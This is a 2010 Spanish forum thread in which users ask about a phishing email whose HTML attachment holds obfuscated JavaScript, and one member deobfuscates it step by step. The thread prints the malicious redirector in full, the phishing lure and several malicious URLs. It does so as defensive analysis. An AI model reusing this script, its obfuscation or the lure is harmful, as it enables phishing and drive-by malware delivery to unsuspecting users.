Foros del Web » Soporte técnico » Virus, troyanos y spyware »

codigo javascript sospechoso

Estas en el tema de codigo javascript sospechoso en el foro de Virus, troyanos y spyware en Foros del Web. Hemos recibido un email desde nuestro propio servidor de correo con un mensaje en ingles: -------------------------------- Dear Customer, This e-mail was send by slibcn.com to ...
  #1 (permalink)  
Antiguo 10/06/2010, 05:38
 
Fecha de Ingreso: junio-2010
Mensajes: 1
Antigüedad: 14 años, 6 meses
Puntos: 0
Exclamación codigo javascript sospechoso

Hemos recibido un email desde nuestro propio servidor de correo con un mensaje en ingles:
--------------------------------
Dear Customer,

This e-mail was send by slibcn.com to notify you that we have temporanly
prevented access to your account.

We have reasons to beleive that your account may have been accessed by
someone else. Please run attached file and Follow instructions.

(C) slibcn.com
--------------------------------

La direccion admin no existe entre nuestros correos de dominio y el dominio sigue operativo.
El archivo adjunto es open.html y abierto con un notepad, solo contiene este código:

<script type='text/javascript'>function uK(){};var kV='';uK.prototype = {f : function() {d=4906;var w=function(){};var u=new Date();var hK=function(){};var h='hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');var n=new Array();var e=function(){};var eJ='';t=document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];this.nH=false;eX=2280;dF="dF";var hN=function(){return 'hN'};this.g=6633;var a='';dK="";function x(b){var aF=new Array();this.q='';var hKB=false;var uN="";b['hIrBeTf.'.replace(/[\.BTAI]/g, '')]=h;this.qO=15083;uR='';var hB=new Date();s="s";}var dI=46541;gN=55114;this.c="c";nT="";this.bG=false;v ar m=new Date();var fJ=49510;x(t);this.y="";bL='';var k=new Date();var mE=function(){};}};var l=22739;var tL=new uK(); var p="";tL.f();this.kY=false;</script>



¿ Alguien que sepa entender su lectura puede ayudarme advirtiendo de su posible peligro ?



Gracias
  #2 (permalink)  
Antiguo 10/06/2010, 07:23
 
Fecha de Ingreso: marzo-2009
Mensajes: 19
Antigüedad: 15 años, 9 meses
Puntos: 0
Respuesta: codigo javascript sospechoso

Tengo el mismo caso hoy mismo llego, por favor publica si sabes algo.

Gracias.
  #3 (permalink)  
Antiguo 10/06/2010, 15:48
 
Fecha de Ingreso: junio-2002
Mensajes: 750
Antigüedad: 22 años, 6 meses
Puntos: 22
Respuesta: codigo javascript sospechoso

Intentaré realizar una pequeña disección del código (si veis que algo está mal podéis avisar para corregirlo).

Primero vamos ha formatear el código para que sea más legible:
Código Javascript:
Ver original
  1. function uK(){};
  2. var kV='';
  3.  
  4. uK.prototype = {
  5.     f : function() {
  6.         d=4906;
  7.         var w=function(){};
  8.         var u=new Date();
  9.         var hK=function(){};
  10.         var h='hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');
  11.         var n=new Array();
  12.         var e=function(){};
  13.         var eJ='';
  14.         t=document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];
  15.         this.nH=false;
  16.         eX=2280;
  17.         dF="dF";
  18.         var hN=function(){return 'hN'};
  19.         this.g=6633;
  20.         var a='';
  21.         dK="";
  22.  
  23.         function x(b){
  24.             var aF=new Array();
  25.             this.q='';
  26.             var hKB=false;
  27.             var uN="";
  28.             b['hIrBeTf.'.replace(/[\.BTAI]/g, '')]=h;
  29.             this.qO=15083;
  30.             uR='';
  31.             var hB=new Date();
  32.             s="s";
  33.         }
  34.  
  35.         var dI=46541;
  36.         gN=55114;
  37.         this.c="c";
  38.         nT="";
  39.         this.bG=false;
  40.         v ar m=new Date();
  41.         var fJ=49510;
  42.         x(t);
  43.         this.y="";
  44.         bL='';
  45.         var k=new Date();
  46.         var mE=function(){};
  47.     }
  48. };
  49.  
  50. var l=22739;
  51. var tL=new uK();
  52. var p="";
  53. tL.f();
  54. this.kY=false;


Seguidamente, tras una lectura del código, descartamos la parte que es de relleno (para dificultar la lectura) y que no tiene utilidad alguna (a no ser que el código proporcionado esté incompleto):
Código Javascript:
Ver original
  1. function uK(){};
  2.  
  3. uK.prototype = {
  4.     f : function() {
  5.         var h='hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');
  6.         t=document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];
  7.  
  8.         function x(b){
  9.             b['hIrBeTf.'.replace(/[\.BTAI]/g, '')]=h;
  10.         }
  11.  
  12.         x(t);
  13.     }
  14. };
  15.  
  16. var tL=new uK();
  17. tL.f();
Mucho más simple de leer, ¿verdad?

Finalmente, veamos qué hace este código:
Código Javascript:
Ver original
  1. // crear una función vacía que sirve como constructor
  2. function uK(){};
  3.  
  4. // Especificar propiedades del prototipo 'uK' para nuevos objetos.
  5. // Este prototipo viene a ser como una plantilla a partir de la cual se crean
  6. // nuevos objetos con un conjunto de valores (o propiedades) base.
  7. // Notar que el objeto 'uK' se ha declarado anteriormente como constructor.
  8. uK.prototype = {
  9.     f : function() {
  10.         // Definir variable h='http://lendermedia.com/images/z.htm'
  11.         // Reemplazo simple de caracteres: entre cada carácter válido se ha
  12.         // intercalado otro no válido que, mediante la función 'replace', es
  13.         // substituido por un carácter nulo ('' o la ausencia de carácter) con el
  14.         // propósito de volver a crear la dirección URL válida.
  15.         // El enmascaramiento de la dirección URL es tan simple que puede verse a simple
  16.         // vista sin necesidad de saber interpretar la expresión regular utilizada
  17.         // en la función 'replace'.
  18.         var h='hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');
  19.  
  20.         // Definir variable t="document['location']"
  21.         // Del mismo modo expuesto con anterioridad, aquí se enmascara
  22.         // el código con una simple intercalación de caracteres para ocultar una
  23.         // parte del código que, luego, es desenmascarado mediante el uso de la
  24.         // función 'replace'.
  25.         t=document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];
  26.  
  27.         function x(b){
  28.             // Uso de la función 'replace' para recuperar el código enmascarado.
  29.             // b[href]=h; (a la variable 'h', como hemos visto anteriormente, tiene
  30.             // asignado el valor 'http://lendermedia.com/images/z.htm') por tanto:
  31.             // b['href']='http://lendermedia.com/images/z.htm';
  32.             b['hIrBeTf.'.replace(/[\.BTAI]/g, '')]=h;
  33.         }
  34.  
  35.         // Llamada a la función 'x' pasándole como parámetro la variable 't' que,
  36.         // como hemos visto antes, tiene asignado el valor "document['location']".
  37.         // Por tanto, tras ejecutar esta función, nos quedará:
  38.         // document['location']['href']='http://lendermedia.com/images/z.htm';
  39.         x(t);
  40.     }
  41. };
  42.  
  43. // Crear el objeto 'tL' que hereda las propiedades o parámetros del prototipo especificado para el constructor 'uK'
  44. var tL=new uK();
  45.  
  46. // Llamada al objeto 'tL' que se encarga de ejecutar las funciones establecidas.
  47. // Este es el punto en el que se procesa todo el código visto anteriormente
  48. // (sin esta llamada el resto de código no hace nada.)
  49. // Es decir que al final lo que hace es ejecutar la sentencia
  50. // document['location']['href']='http://lendermedia.com/images/z.htm';
  51. // para que al abrir el documento adjunto en un navegador web redirija la página a la dirección indicada.
  52. tL.f();

Al abrir la dirección indicada hay un iframe oculto que accede a
Código:
http://zoojeans.ru:8080/index.php?pid=10
y pasados 3 segundos redirige a
Código:
http://toldspeak.com
No he analizado estas páginas ni sus archivos o código y por tanto no puedo decir si contienen código malicioso o intentan aprovecharse de alguna vulnerabilidad para colar malware y virus. Lo que sé es que una de ellas contiene publicidad de viagra y otras lindezas.
Lo que está claro es que es mejor no abrirlo ya que entraña un posible riesgo.
  #4 (permalink)  
Antiguo 10/06/2010, 16:59
 
Fecha de Ingreso: marzo-2009
Mensajes: 19
Antigüedad: 15 años, 9 meses
Puntos: 0
Respuesta: codigo javascript sospechoso

Hombre muchas gracias! muy ilustrativo habrá que tener cuidado

Etiquetas: correo, html, javascript, peligro
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 10:04.